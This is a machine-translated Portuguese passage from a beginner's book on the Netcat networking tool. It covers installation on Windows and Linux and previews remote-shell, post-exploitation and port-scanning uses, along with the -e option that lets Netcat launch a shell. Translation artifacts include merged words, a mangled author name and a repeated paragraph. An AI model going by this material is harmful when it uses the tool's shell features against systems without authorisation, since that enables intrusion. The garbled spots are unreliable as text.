Traduzido do Inglês para o Português - www.onlinedoctranslator.

com
Iniciador Instantâneo do Netcat

Aprenda a aproveitar o poder e a versatilidade do Netcat e

entenda por que ele continua sendo parte integrante dos kits de
ferramentas de TI e segurança até hoje

KCYerridGenericName

BIRMINGHAM - MUMBAI
Iniciador Instantâneo do Netcat

Copyright © 2013 Packt Publishing

Todos os direitos reservados. Nenhuma parte deste livro pode ser reproduzida, armazenada em sistema de
recuperação ou transmitida de qualquer forma ou por qualquer meio, sem a permissão prévia por escrito do
editor, exceto no caso de breves citações incorporadas em artigos críticos ou resenhas.

Todos os esforços foram feitos na preparação deste livro para garantir a precisão das informações
apresentadas. No entanto, as informações contidas neste livro são vendidas sem garantia, expressa ou
implícita. Nem o autor, nem a Packt Publishing e seus revendedores e distribuidores serão
responsabilizados por quaisquer danos causados ou alegadamente causados direta ou indiretamente
por este livro.

A Packt Publishing se esforçou para fornecer informações sobre marcas registradas de todas as empresas e
produtos mencionados neste livro, usando letras maiúsculas de forma apropriada. No entanto, a Packt
Publishing não pode garantir a precisão dessas informações.

Publicado pela primeira vez: janeiro de 2013

Referência de Produção: 1170113

Publicado por Packt Publishing Ltd.

Livery Place
Rua da libré 35
Birmingham B3 2PB, Reino Unido.

ISBN 978-1-84951-996-0

www.packtpub.com
 Créditos
Autor Coordenadores de Projetos

KC "K0nsp1racy" Yerrid Shraddha Bagadia

Esha Thakker
Revisor
Jonathan Craton Revisor
Kelly Hutchison

Editor de conteúdo e
comissionamento de TI
Gráficos
Grant Mizen
Aditi Gajjar

Editor comissionado
Coordenador de produção
Priyanka Shah
Melwyn D'sa

Editor Técnico
Trabalho de capa
Ameya Sawant
Melwyn D'sa

Editor de cópia
Imagem de capa
Alfida Paiva
Conidon Miranda
 Sobre o autor
KCYerridGenericNameconstruiu sua carreira através de trabalho duro, eficiência e pura
determinação. Ele pode ser descrito como um líder de pensamento em segurança da informação
e um recurso altamente adaptável que solidifica a estrutura das organizações de segurança da
informação. Com um espírito empreendedor, ele demonstra uma energia apaixonada por ajudar
clientes e partes interessadas em ambientes desafiadores. Ele é fiscalmente consciente e se
compromete a otimizar os investimentos existentes antes de adquirir "soluções de luz
intermitente". Ele também é altamente motivado por metas organizacionais e utiliza criatividade e
habilidades analíticas para chegar a soluções táticas e estratégicas sustentáveis. Ele aborda cada
desafio de negócios como uma oportunidade única para alavancar a tomada de decisões
estratégicas sólidas, a solução criativa de problemas,

KCYerrid é bacharel em Ciência da Computação, Mestre em Gerenciamento de Sistemas de

Informação, bem como Mestre em Administração de Empresas, e está cursando Doutorado
em Gestão Organizacional em Tecnologia da Informação. Atualmente possui as
certificações CISSP, CISM e CEH. Ele representou organizações nos setores de manufatura,
finanças e bancos, varejo e consultoria de tecnologia,
e é membro fundador do Security Awareness Training Framework
(http://www.satframework.org).
 Reconhecimento
Este livro levou muitos anos para ser escrito. Isso exclui toda a tecnologia que é discutida com a
Netcat e começa com a motivação e perseverança para nunca ter medo de fazer essa pergunta
aparentemente idiota. Suponho que a curiosidade é o caminho para a experiência; Ao longo da
minha vida, tive a sorte de ter um sistema de apoio tão sólido que sempre pude me dar ao luxo de
correr riscos calculados – dar um passo nesse proverbial membro – e não ter medo de falhar.
Acumulei muitas dívidas de pessoas para as quais nunca poderei pagar e, portanto, só espero pagá-
las adiante e fazer parte do sucesso de outra pessoa.

Grande parte da autoria e edição deste livro foi feita em quartos de hotel, longe de minha
família e entes queridos. Meu tempo em Minnesota e Arizona foi um fardo tremendo para
minha maravilhosa esposa e alma gêmea, Des. Sem seu apoio ao longo desta jornada –
cuidando de nossos lindos filhos, Sydney e Austin, e sendo a caixa de ressonância para minhas
ideias, comentários e sim... às vezes reclamações – este livro certamente nunca teria acontecido.

A busca pelo conhecimento e a gratificação da descoberta estão profundamente arraigadas em minha psique.
Tenho a sorte de ter sido abençoado por crescer em uma família tradicional e nuclear, ancorada por meu
falecido pai, David, que trouxe para casa um laptop Epson HX-20 e mais tarde comprou um computador
desktop IBM PCjr (leia-se "PC júnior") para eu brincar por horas a fio naqueles anos de formação. A coragem,
tenacidade, bondade e compaixão que ele demonstrou todos os dias me inspiram a ser uma boa pessoa hoje.
Ele me ensinou o valor de um aperto de mão e a importância de viver com integridade inabalável. Minha mãe,
Jean, é minha maior fã, independente do que eu faça na vida. É através de seu amor e carinho por mim que me
fazem nunca menosprezar meus sucessos e me inspira a dedicar tempo para ensinar qualquer pessoa que
esteja disposta a aprender. Meu irmão mais velho, Mike, tem sido um exemplo brilhante de como ter sucesso
no mundo dos negócios e é uma grande influência na minha paixão e motivação em tecnologia. Meu outro
irmão, Rich, sempre esteve ao meu lado quando precisei dele, e é por meio de seu espírito empreendedor que
me permite experimentar novos programas, técnicas ou empreendimentos, como este livro. Além disso, ele
tem uma personalidade e uma risada que não pode deixar de ser atraído.
Francis Bacon disse uma vez: "A pior solidão é ser destituído de amizade sincera". Durante o
processo de criação deste livro, sempre pude contar com alguns dos meus melhores amigos no
mundo para me motivar a continuar. Não preciso olhar mais longe do que Ed Maciejewski como
exemplo de alguém que suportou dificuldades extremas e continua perseverando diante da
adversidade. A vida de Ed nos últimos dois anos é verdadeiramente inspiradora para mim, e tenho
orgulho de ser seu amigo. Junto com o carinho e a gentileza de seus sogros, Sue e Ralph Hoffman e
Larry Nash, sinto que sempre tenho uma família extensa para chamar de minha. Também gostaria
de agradecer ao meu pastor, vizinho e amigo Kyle Thompson e sua incrível esposa Lora por
ajudarem a mim e minha família durante alguns de nossos momentos mais desafiadores em
nossas vidas.

Profissionalmente, uma das minhas citações favoritas é do filósofo romano Sêneca, que afirmou: "Um jovem respeita e admira seus professores". Com esta citação

como pano de fundo, gostaria de agradecer a algumas das muitas pessoas que me moldaram profissionalmente e contribuíram indiretamente para a conclusão

deste livro. Jack Wiles é o principal responsável por me inspirar a ser um profissional de segurança da informação. Embora seja possível que eu tenha um

conhecimento prático do Netcat através do meu histórico de operações e desenvolvimento, a apresentação de Jack sobre a magia da engenharia social e hacking sem

tecnologia foi o "momento a-ha" que me fez querer ser um profissional de segurança . Dr. Rory Lewis me desafiou a continuar o caminho do ensino superior, pensar

estrategicamente e ousar inovar e compartilhar meu conhecimento. Ele é realmente um mentor e um amigo fantástico. Também gostaria de agradecer a Fred Millet e

Mike Royer por me darem minha primeira oportunidade em minha carreira como estagiário em uma organização de manufatura. Serei eternamente grato a eles por

sua instrução e orientação em minha vida e pelas portas que ajudaram a abrir em minha carreira. Finalmente, gostaria de agradecer a Ed Skoudis, Brian Baskin,

Thomas Wilhelm e Michael Scherer por lançar as bases e me ensinar tanto sobre o utilitário Netcat. É principalmente através de suas contribuições para o campo que

sou capaz de falar de forma inteligente sobre o assunto. Serei eternamente grato a eles por sua instrução e orientação em minha vida e pelas portas que ajudaram a

abrir em minha carreira. Finalmente, gostaria de agradecer a Ed Skoudis, Brian Baskin, Thomas Wilhelm e Michael Scherer por lançar as bases e me ensinar tanto

sobre o utilitário Netcat. É principalmente através de suas contribuições para o campo que sou capaz de falar de forma inteligente sobre o assunto. Serei

eternamente grato a eles por sua instrução e orientação em minha vida e pelas portas que ajudaram a abrir em minha carreira. Finalmente, gostaria de agradecer a

Ed Skoudis, Brian Baskin, Thomas Wilhelm e Michael Scherer por lançar as bases e me ensinar tanto sobre o utilitário Netcat. É principalmente através de suas

contribuições para o campo que sou capaz de falar de forma inteligente sobre o assunto.

É interessante ver o que é um esforço colaborativo de autoria e publicação de um livro. Eu seria

negligente em não reconhecer o bom trabalho que a equipe de edição desempenhou na publicação do
livro. Shraddha Bagadia, Priyanka Shah e Jon Craton fizeram um trabalho magistral ao manter a
mensagem pretendida deste livro no ponto e no nível a que se destina.
 Sobre o revisor
Jonathan Cratoné um engenheiro de software que trabalha principalmente com tecnologias de
rede e web. Ele tem muitos anos de experiência trabalhando em sistemas de rede de grande escala e
tem experiência com segurança de rede e software de análise.

Jon é bacharel em Engenharia da Computação e mestre em Ensino Superior.

 www.packtpub.com

Arquivos de suporte, eBooks, ofertas de desconto e muito mais

Você pode querer visitarwww.PacktPub.compara arquivos de suporte e downloads relacionados ao

seu livro.

Você sabia que a Packt oferece versões eBook de todos os livros publicados, com arquivos PDF e ePub
disponíveis?Você pode atualizar para a versão eBook emwww.PacktPub.come como cliente do livro
impresso, você tem direito a um desconto na cópia do eBook. Entre em contato conosco em
service@packtpub.com _para mais detalhes.

Nowww.PacktPub.com,você também pode ler uma coleção de artigos técnicos gratuitos, inscrever-se em uma variedade
de boletins informativos gratuitos e receber descontos e ofertas exclusivas em livros e e-books Packt.
 packtLib.packtPub.com
Você precisa de soluções instantâneas para suas questões de TI? PacktLib é a biblioteca de livros digitais online
da Packt. Aqui, você pode acessar, ler e pesquisar em toda a biblioteca de livros da Packt.

Por que se inscrever?

Ê Totalmente pesquisável em todos os livros publicados pela

Ê Packt Copie e cole, imprima e marque o conteúdo

Ê Sob demanda e acessível via navegador da web

Acesso gratuito para titulares de contas Packt

Se você tem uma conta com Packt emwww.PacktPub.com,você pode usar isso para acessar o PacktLib hoje e
ver nove livros totalmente gratuitos. Basta usar suas credenciais de login para acesso imediato.
 Índice
Iniciador Instantâneo do Netcat 1
Então, o que é Netcat? 3
Usos comuns para Netcat 4
Instalação 6
Para todas as plataformas suportadas 6
Passo 1 – o que eu preciso? 6
Para instalações do Windows 9
Etapa 2 – baixar o Netcat da Internet Etapa 3 – 9
extrair o Netcat do arquivo ZIP Etapa 4 – 10
verificar a operação do programa 10
Para instalações Linux/Unix (Instalação Unix Netcat) 11
Passo 2 – baixando o Netcat da Internet Passo 3 – 11
instalando o Unix Netcat 12
Etapa 4 - verificar a operação do programa 17
Para instalações Linux/Unix (Instalação GNU Netcat) 18
Passo 2 – baixando o GNU Netcat da Internet Passo 3 – 18
compilando e instalando o GNU Netcat 20
Etapa 4 - verificar a operação do programa 21
Ncat do Projeto Nmap (Todas as 21
distribuições) E é isso 22
Início rápido – o básico do Netcat 23
Etapa 1 – usando o Netcat para uma interface de bate-papo 24
simples Etapa 2 – transferindo dados com o Netcat 26
Passo 3 – pegando banner com Netcat Os 3 30
principais recursos que você vai querer conhecer 33
Usando o Netcat para obter um shell remoto em um computador de destino 33
Shell remoto do Windows (e simples hi-jinks pós-exploração) Shell 33
remoto do Linux 38
Verificação de portas com Netcat 42
Varredura básica de portas em relação a um destino 42
Varredura aleatória de portas em relação a um destino 43
Índice

Verificação mais detalhada em relação a um alvo Verificação de 43

uma variedade de dispositivos com um script 44
Outros interruptores importantes do Netcat 44
Pessoas e lugares que você deve conhecer 47
Sites oficiais 47
Artigos e tutoriais 47
Blogues e sites 47
Twitter 48

[ii]
Iniciador Instantâneo do Netcat

Bem vindo àIniciador Instantâneo do Netcat. Este livro foi especialmente criado para fornecer
a você todas as informações necessárias para se familiarizar com o Netcat. Você aprenderá a
terminologia básica do Netcat, como instalar e/ou compilar o Netcat para plataformas
Windows ou Unix/Linux e muitas das opções que podem ser usadas para alavancar o poder e
a flexibilidade desta ferramenta popular para uma variedade de cenários.

Este guia contém as seguintes seções:

Então, o que é Netcat?–Descubra o que o Netcat realmente é, os dois principais modos em que o
Netcat é executado, o que você pode fazer com esses modos e por que ele permanece inestimável
em kits de ferramentas de segurança da informação e operação de rede até hoje.

Instalação–Aprenda como baixar e instalar o Netcat nas plataformas

Windows e Unix/Linux, incluindo compilar e executar os binários.

Começo rápido–Esta seção irá ajudá-lo a usar o Netcat em cada um de seus modos primários.
Aqui você aprenderá como executar algumas das principais tarefas essenciais para usar o
Netcat de forma eficaz.

Os 3 principais recursos que você vai querer conhecer–Muitas pessoas afirmam que o
Netcat é limitado apenas pela imaginação da pessoa que o utiliza. Nesta seção, você
aprenderá sobre cada uma das opções de parâmetro e quando usá-las para atingir seus
objetivos.

Pessoas e lugares que você deve conhecer–Esta seção fornece muitos links úteis
para as várias páginas e pessoas do projeto, bem como vários artigos úteis,
tutoriais, blogs e feeds do Twitter do Netcat e outros aplicativos relacionados
que são usados em conjunto com o Netcat.
 Iniciador Instantâneo do Netcat

Então, o que é Netcat?

De vez em quando, alguém se depara com um item clássico que foi descoberto em bom estado, apesar de estar
sob um pano de poeira ou no sótão de um parente por anos. Talvez seja um cartão de beisebol de estreante
Mickey Mantle de 1952 (sem o chiclete, é claro), ou uma versão antiga da revista em quadrinhos Action Comics
#1 (estreia do Superman para os não iniciados). No mundo da segurança da informação e das operações de
rede, uma dessas joias é o utilitário clássico Netcat.

Lançado inicialmente em 1995, o Netcat sobreviveu e continua a prosperar apesar de sua idade e relativa
simplicidade. De acordo comSecTools.org,O Netcat é classificado como a oitava ferramenta de segurança de rede
favorita (Nmap Security Scanner Project, 2011). Embora muitas portas e variações tenham surgido com base no
utilitário clássico, o Netcat ainda está disponível em sua forma original em vários sites.

Em sua interpretação mais básica, o Netcat estabelece uma conexão entre dois computadores e permite que os
dados sejam gravados nos protocolos da camada de transporte TCP e UDP e no protocolo IP da camada de
rede. Para aqueles familiarizados com distribuições Unix e Linux, o nome é provavelmente o derivado do
comando clássicogato,com recursos de rede adicionados para maior utilidade. Dada a variedade de tarefas e
cenários que o Netcat conseguiu realizar para seus operadores, não é de admirar que a maioria das referências
ao utilitário o chame de canivete suíço para comunicações TCP/IP (Netcat). No entanto, na realidade, o Netcat
resolve problemas mais de acordo com o tipo de problemas que um rolo de fita adesiva pode resolver.

No centro da funcionalidade, o Netcat opera em um dos dois modos básicos. Como cliente, o Netcat opera
com o propósito expresso de iniciar uma conexão com outro computador (ou o mesmo computador; mais
sobre isso daqui a pouco). Por outro lado, o mesmo binário Netcat opera em um modo de servidor ou
ouvinte quando parâmetros específicos são passados para o utilitário. Essas opções são descritas na saída
nas seguintes linhas (também mostradas na próxima captura de tela):

conectar-se a algum lugar: nc [-options] hostname port[s] [ports] escutar

entrada: nc -l -p port [options] [hostname] [port]

3
Iniciador Instantâneo do Netcat

Netcat para Windows com opções listadas

Usos comuns para Netcat

Netcat é um utilitário leve e flexível que pode ser usado em diversos cenários. Nesta seção,
abordarei alguns dos usos mais comuns e, em seções posteriores, abordarei alguns dos usos
mais exóticos.

Ê Servidor de bate-papo/mensagens: Ao usar o Netcat, um operador pode redirecionar texto simples entre dois

computadores em um chat simplista ou em uma interface de mensagem instantânea.

Ê Transferências de arquivos: Netcat permite transferir arquivos entre computadores sem a necessidade de
instalar um servidor FTP completo.

Ê Captura de Banner: O Netcat permite que um operador estabeleça um soquete para uma porta
específica para identificar potencialmente o sistema operacional, serviço, versão e outras
informações necessárias para enumerar a finalidade e/ou possíveis pontos fracos no serviço.

Ê Verificação de portas:O Netcat permite que o operador utilize uma função de varredura de porta
rudimentar, pela qual uma porta ou uma série de portas podem ser interrogadas para determinar se a porta
está aberta ou fechada.

4
 Iniciador Instantâneo do Netcat

Independentemente da necessidade, provavelmente existe uma solução criativa que a Netcat pode ajudar a
atender sua operadora. Com isso em mente, vamos mergulhar na carne e nas batatas deste utilitário
baixando e trabalhando diretamente com o Netcat. Veremos como colocar você em funcionamento com as
versões Unix/Linux e Windows do utilitário. Vamos lá!

5
Iniciador Instantâneo do Netcat

Instalação
Em quatro etapas fáceis, você pode instalar o Netcat e configurá-lo em seu sistema, seja Windows,
Linux, Unix ou Mac OS X. Para resumir, vamos nos concentrar nas distribuições Windows e Debian
do Linux. O Mac OS X tem o Netcat instalado por padrão, embora sem o
DGAPING_SECURITY_HOLEopção habilitada (que é explicada mais adiante). Para obter informações sobre a
recompilação do Netcat para Mac OS X (BSD) com a opção DGAPING_SECURITY_HOLE, consulte as
instruções de compilação nas páginas man.

Para todas as plataformas suportadas

Os requisitos para o Netcat refletem os bons e velhos tempos da computação, quando Bill Gates foi notoriamente (e
também incorretamente) atribuído ao teto de 640 K de memória em computadores pessoais.
necessidades de computação (consultehttp://www.wired.com/politics/law/news/1997/01/1484).
Embora o Netcat não seja tão leve, vamos examinar os requisitos.

Passo 1 – o que eu preciso?

Um dos recursos mais atraentes do uso do Netcat em seu ambiente é a pegada incrivelmente pequena que o
utilitário ocupa tanto no cliente quanto no ouvinte. Se você não estiver completamente confortável em um
Interface de linha de comando (CLI)ambiente, não tenha medo. A maior parte do trabalho pesado para
instalar o Netcat é feito nas etapas que levam à instalação.

Antes de mergulhar com os dois pés, há um pequeno contexto histórico que deve ser comunicado a você.
Como mencionado anteriormente, o Netcat é um velho, mas bom. Um dos subprodutos de sua
longevidade é como a utilidade foi mantida ao longo dos anos. Basicamente, houve três caminhos
principais pelos quais o utilitário evoluiu. O primeiro é o Unix Netcat original que foi lançado pela Hobbit.
Esta versão conterá a Versão 1.10 (ou 1.11 em alguns casos). A segunda versão principal é a versão GNU
Netcat que está hospedada no repositório de código fonte baseado na web do SourceForge. O objetivo
da versão GNU é ter total compatibilidade com todas as funções do Unix Netcat Versão 1.10. Finalmente,
este livro seria negligente em não incluir referências à versão do Netcat do projeto Nmap, simplesmente
chamadaNcat. De acordo com o site do Projeto Nmap, o Ncat foi escrito para o Projeto Nmap como uma
reimplementação muito melhorada do venerável Netcat (Projeto Nmap).

6
 Iniciador Instantâneo do Netcat

A última coisa que você precisa saber sobre o Unix Netcat original é que alguns tipos de Linux e Unix
podem ter recompilado o Unix Netcat original sem a capacidade de executar programas na conexão
com o ouvinte. A opção DGAPING_SECURITY_HOLE permite que um operador execute programas
usando o –eswitch para executar uma série de tarefas poderosas, incluindo o lançamento de um shell.
Como resultado, essas versões pré-compiladas e pré-instaladas são consideradas "mais seguras" do
que as outras versões que permitem o –etrocar. Se você pesquisar por "Netcat
DGAPING_SECURITY_HOLE" em seu mecanismo de pesquisa favorito, sem dúvida verá o equivalente a
uma briga de tapa de hamster sobre os riscos e benefícios da opção DGAPING_SECURITY_HOLE. Para
determinar se sua instância do Netcat foi compilada com a opção DGAPING_SECURITY_HOLE, basta
digitarnc –hna linha de comando. A captura de tela a seguir demonstra a saída de uma instância do
Netcat sem o DGAPING_SECURITY_HOLE (observe a ausência do –etrocar):

7
Iniciador Instantâneo do Netcat

Por outro lado, a captura de tela a seguir demonstra o utilitário Netcat com a
opção DGAPING_SECURITY_HOLE habilitada:

Netcat é um programa relativamente fácil de obter, configurar e instalar. Na verdade, a maioria das distribuições de
Unix e Linux tem uma versão pré-compilada do Netcat já instalada e configurada. Discutiremos brevemente a principal
razão pela qual você pode querer recompilar sua instância do Netcat daqui a pouco, mas, por enquanto, vamos nos
concentrar nos requisitos para que você comece a trabalhar rapidamente.

Felizmente, todas as distribuições para as quais estou fornecendo links nesta seção têm a
opção DGAPING_SECURITY_HOLE habilitada. Isso inclui o Unix Netcat, GNU Netcat e, claro,
Ncat para Windows e Unix.

Antes de obter e instalar o Netcat, você precisará verificar se possui todos os elementos
necessários, listados a seguir:

Ê Espaço em disco:300 KB grátis (mínimo). Você leu corretamente. No Windows, onc

pasta, incluindo todos os arquivos de origem e de ajuda, ocupa 280 KB no disco. Para instalações do
Windows, quando você terminar de extrair os arquivos, o único arquivo necessário énc.exe, que
pesa em 60 KB.

Ê Memória:2 MB (mínimo), 8 MB (recomendado).

8
 Iniciador Instantâneo do Netcat

Para instalações do Windows

As distribuições do Windows são relativamente diretas, uma vez que você encontre o arquivo para
fazer o download.

Passo 2 – baixando o Netcat da Internet

Encontrar os binários do Windows provou ser um pouco difícil e não confiável, pois o ponto de
distribuição mais comum, anteriormente localizado emhttp://www.vulnwatch.org/netcat/nc111nt.zipparece
ter ficado offline e o binário não está disponível. Não se preocupe, ao fazer uma busca pornc111nt.zip
no meu mecanismo de pesquisa favorito, consegui localizar dois sites espelho que parecem ser
confiáveis e comprometidos em hospedar o binário. Por favor, verifique um dos seguintes sites:

Ê http://www.hackosis.com/wp-content/uploads/2007/12/nc111nt.zip

Ê http://joncraton.org/files/nc111nt.zip

Para fins de nossos exercícios, usaremos a versão desses sites, ambos calcularam um valor de hash
MD5 de37f2383aa4e825e7005c74099f8bb2c3, conforme mostrado na captura de tela a seguir
(agradecimentos especiais à equipe do Security Xploded por criar uma incrível ferramenta geradora
de hash):

9
Iniciador Instantâneo do Netcat

Passo 3 – extraindo o Netcat do arquivo ZIP

Para binários do Windows, basta clicar duas vezes nonc111nt.ziparquivo que você baixouPasso 2
– baixando o Netcat da Internet. O único arquivo que é necessário para executar énc.exe,localizado na pasta
extraída, conforme mostrado na captura de tela a seguir:

Etapa 4 - verificar a operação do programa

Uma vez concluído, você pode verificar o sucesso da compilação e instalação digitando o
nc –hcomando no prompt de comando.

Se sua tela for semelhante à mostrada na captura de tela anterior, você implementou com êxito o
Netcat na plataforma Windows. A partir deste ponto, você pode continuar a explorar outras
instruções de instalação da distribuição ou pular para a próxima seção, onde começaremos a
trabalhar com a ferramenta.

10
 Iniciador Instantâneo do Netcat

Para instalações Linux/Unix (Instalação Unix Netcat)

Para instalações Linux/Unix, você pode achar mais fácil ou um pouco mais difícil começar a usar o Netcat. Hoje,
muitas distribuições do Linux (assim como o Mac OS X, baseado em BSD) têm uma versão do Netcat pré-
instalada. No entanto, a versão instalada pode não atender exatamente às suas necessidades; portanto, vamos
examinar algumas abordagens diferentes para obter a versão correta em sua máquina Linux/Unix.

Passo 2 – baixando o Netcat da Internet

Na minha experiência, a maioria das distribuições do Linux tem a versão Unix do Netcat disponível nos
aplicativos de gerenciamento de pacotes em sua distribuição específica. No entanto, pode haver um
momento em que você desejará obter a fonte de um local confiável. Os seguintes locais hospedam os
binários:

Ê http://packetstormsecurity.org/files/download/14051/nc110.tgz

Ê http://sourceforge.net/projects/nc110/files/latest/download

O hash MD5 produzido por este arquivo é402632f2fe01c169ff19a0ad6e9d608c, conforme mostrado na

captura de tela a seguir:

11
Iniciador Instantâneo do Netcat

Passo 3 – instalando o Unix Netcat

Como mencionado anteriormente, a maioria das distribuições do Linux tem o Netcat instalado por padrão.
Neste exemplo, estou usando o Linux Mint 13, com a área de trabalho MATE. No meu caso, a versão do
Netcat que estou executando por padrão é uma versão do OpenBSD que tem a opção
DGAPING_SECURITY_HOLE desabilitada. Como exploraremos essa opção em exercícios futuros, precisarei
instalar a versão adequada. Em exemplos posteriores, mostrarei como compilar e instalar o Netcat a partir de
uma fonte; no entanto, neste exemplo, usarei o Gerenciador de Pacotes do Linux Mint para instalar a versão
correta. A captura de tela a seguir mostra a instalação padrão do Netcat; observe o texto que explica que
existe outra versão disponível no pacote Netcat-tradicional (linha 3):

Antes de instalarmos os binários corretos do Netcat, iremos em frente e removeremos a versão antiga.
Para fazer isso, você pode emitir oapt-getcomando a partir da linha de comando, ou simplesmente inicie
seu gerenciador de pacotes e faça com que o script faça isso por você. Vamos seguir a rota da GUI,
provavelmente para desgosto dos puristas do Linux. Para aqueles que desejam remover o pacote da
linha de comando, basta digitar o comandosudo apt-get remove --purge netcat-openBSD,digite sua senha
sudo e selecioneSconfirmar. No entanto, assumindo zero experiência no Linux, na área de trabalho
MATE, primeiro selecionaremos o aplicativo Package Manager, conforme mostrado na captura de tela a
seguir:
12
 Iniciador Instantâneo do Netcat

Como o Synaptic está modificando seu sistema, você provavelmente precisará inserir suas credenciais
sudo, conforme mostrado na captura de tela a seguir:

13
Iniciador Instantâneo do Netcat

Uma lista de pacotes de software aparecerá. Inserindonetcatna barra de pesquisa, você verá os
doisnetcat-openbsdpacote e onetcat-tradicionalpacote. A caixa verde na captura de tela a
seguir mostra quenetcat-openbsdestá sendo instalado atualmente:

vamos marcar onetcat-openbsdpacote para remoção completa usando o botão direito do mouse, conforme
demonstrado na captura de tela a seguir:

O quadrado mudará de verde para vermelho para indicar isso, conforme mostrado na captura de tela a seguir:

Clique noAplicarbotão. O Synaptic informará quais serão os resultados das

ações e você verá a imagem na captura de tela a seguir:

14
 Iniciador Instantâneo do Netcat

Depois de solicitarmos a remoção completa donetcat-openbsdpacote, o gerenciador de

pacotes executará as ações solicitadas e, quando concluído, mostrará o feedback
conforme exibido na captura de tela a seguir:

15
Iniciador Instantâneo do Netcat

Agora vamos simplesmente instalar onetcat-tradicionalpacote usando a mesma técnica. Se você

deseja instalar a partir da linha de comando, basta digitarsudo apt-get install netcattradicional,e
baterEntrar. A captura de tela a seguir demonstra a marcação donetcattradicionalpacote para
instalação com o botão direito do mouse:

Na próxima captura de tela, demonstro o que você deve ver ao aplicar a instalação.

16
 Iniciador Instantâneo do Netcat

Por fim, a captura de tela a seguir mostra o resultado da operação:

Etapa 4 - verificar a operação do programa

Uma vez concluído, você pode verificar o sucesso da compilação e instalação digitando onc –h
comando no prompt de comando. Se sua tela for semelhante à captura de tela a seguir, você
instalou o utilitário com êxito. Fique à vontade para ficar por aqui enquanto instalamos o
utilitário GNU Netcat ou pule para a próxima seção.

17
Iniciador Instantâneo do Netcat

Para instalações Linux/Unix (Instalação GNU Netcat)

Tenha em mente que a versão Hobbit/Unix do Netcat não é suportada ou mantida
centralmente. Portanto, você pode querer aprender e começar a acompanhar as versões
atualmente suportadas e mantidas do projeto GNU Netcat.

Passo 2 – baixando o GNU Netcat da Internet

Encontrar o GNU Netcat é muito simples, pois sua fonte está sendo mantida no repositório de código
fonte baseado na web SourceForge. Para baixar o GNU Netcat, navegue até
http://netcat.sourceforge.netconforme mostrado na próxima captura de tela e selecione o link de
download conforme exibido no canto superior direitoO projeto GNU Netcatpágina:

Ao selecionar o link de download, você verá uma página semelhante à captura de tela
a seguir, permitindo que você selecione o RPM e os arquivos compactados:

18
 Iniciador Instantâneo do Netcat

Basta selecionar a distribuição desejada e você está pronto para as corridas. Ao contrário da
implementação Unix Netcat, as distribuições GNU Netcat fornecem os hashes MD5 para você
diretamente no site, portanto, verifique seu download antes de instalar para garantir que não haja
erros e nenhum ajuste nos arquivos.

Agora, por uma questão de consistência, baixamos o pacote usando nosso navegador web confiável. No
entanto, apenas para mudar um pouco as coisas, usaremos um meio diferente para compilar e instalar o
GNU Netcat usando nosso confiávelInterface de linha de comando (CLI). Se você nunca compilou e
instalou um pacote de uma fonte, não se preocupe. Teremos sujeira sob as unhas, mas será uma boa
experiência. Então, vamos fazê-lo!

19
Iniciador Instantâneo do Netcat

Passo 3 – compilando e instalando o GNU Netcat

Na sua máquina Linux, use owgetcomando ou simplesmente navegue até o URL de download do
GNU Netcat. Na linha de comando, digite o seguinte comando:

wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz

Depois que o arquivo for baixado, navegue até o diretório e digite os seguintes comandos, conforme mostrado
na próxima captura de tela:

tar –xzf netcat-0.7.1.tar.gz cd

Netcat-0.7.1
. /configurar

Depois que o sistema fizer sua parte (várias linhas de texto passarão), você retornará ao prompt
do shell. Conforme mostrado na próxima captura de tela, digite o seguinte comando:

fazer

Por fim, digite o seguinte comando para instalar os binários compilados, conforme mostrado na próxima
captura de tela:

sudo make install

20
 Iniciador Instantâneo do Netcat

Etapa 4 - verificar a operação do programa

Se tudo correu bem, você deve ser capaz de digitarnc –hem um prompt de shell e veja os resultados de seus
esforços na próxima captura de tela. Isso não era tão ruim agora, era?

Ncat do projeto Nmap (todas as distribuições)

O Projeto Nmap integra o Ncat com seu aplicativo Nmap, portanto, instalar o Ncat é tão simples quanto
instalar o Nmap. Para nossos propósitos, as instruções específicas de instalação do Nmap estão fora do
escopo deste livro; no entanto, você pode encontrar a página de download para Nmap e Ncat em
http://www.nmap.org/download.html.

21
Iniciador Instantâneo do Netcat

Para que você possa ver as semelhanças entre os utilitários Unix e GNU Netcat, a captura de tela a
seguir mostra a primeira página de opções. Nesta captura de tela, estou usando minha distribuição
Linux favorita, BackTrack, que pode ser encontrada emhttp://www.backtrack-linux.org.Importante notar que
enquanto as outras versões do Netcat são iniciadas usando oncexecutável, o utilitário do projeto Nmap
é iniciado a partir do comandonão

E é isso
A essa altura, você deve ter pelo menos uma instalação funcional do Netcat e está livre para brincar e
descobrir mais sobre ela. Se não cobrimos seu sistema operacional específico ou distribuição Linux,
consulte as páginas man de sua distribuição. No entanto, continuaremos com a suposição de que,
quando passarmos para a próxima seção, veremos aproximadamente as mesmas coisas. Então,
estamos prontos para realmente entrar debaixo do capô?

22
 Iniciador Instantâneo do Netcat

Início rápido – o básico do Netcat

O Netcat, como muitas ferramentas de segurança, pode ser usado para fins legítimos ou
nefastos. Como autor, não desejo pressupor sua bússola moral individual. Eu recomendo que
você, como leitor, siga todas as leis e regulamentos que regem suas ações.

Além disso, na primeira vez que você iniciar o executável Netcat em uma máquina Windows, seu antivírus e/ou firewall
poderá detectar atividades maliciosas, conforme ilustrado na captura de tela a seguir. Observe que a captura de tela
mostra a captura de tela padrão conforme solicitado pelo Windows 7; no entanto, as opções que você seleciona aqui
são amplamente baseadas em quais são suas intenções com o Netcat. Em uma configuração de laboratório, talvez seja
aconselhável alternar as caixas de seleção para permitir apenas que o Netcat se comunique em redes privadas.

É certo que eu queria escrever este livro para fornecer algumas instruções gerais sobre como se
familiarizar com o Netcat com eficiência e ensinar alguns dos recursos mais comuns do
aplicativo. Para isso, vamos analisar funções em exercícios simples, cujo objetivo principal é
fornecer uma visão geral da própria ferramenta.

23
Iniciador Instantâneo do Netcat

Etapa 1 – usando o Netcat para uma interface de bate-papo simples

Cliente Netcat
192.168.0.11/24
GNU Netcat 0.7.1
Linux Mint

Ouvinte Netcat
192.168.0.10/24
Unix Netcat v1.11
janelas

Para este exercício, usaremos uma configuração simples para demonstrar como o Netcat pode ser usado como
uma interface de bate-papo simples entre um cliente e um ouvinte. Para esses exercícios, os sabores do Netcat
e os sistemas operacionais não importam. Neste exercício específico, você só precisa de uma única máquina
executando duas instâncias do Netcat a partir da linha de comando para atingir os objetivos. No entanto, as
lições futuras provavelmente funcionarão melhor com várias máquinas, o que pode ser feito facilmente usando
um aplicativo de software de virtualização de uma das fontes listadas na tabela a seguir:

Pacote URL de download

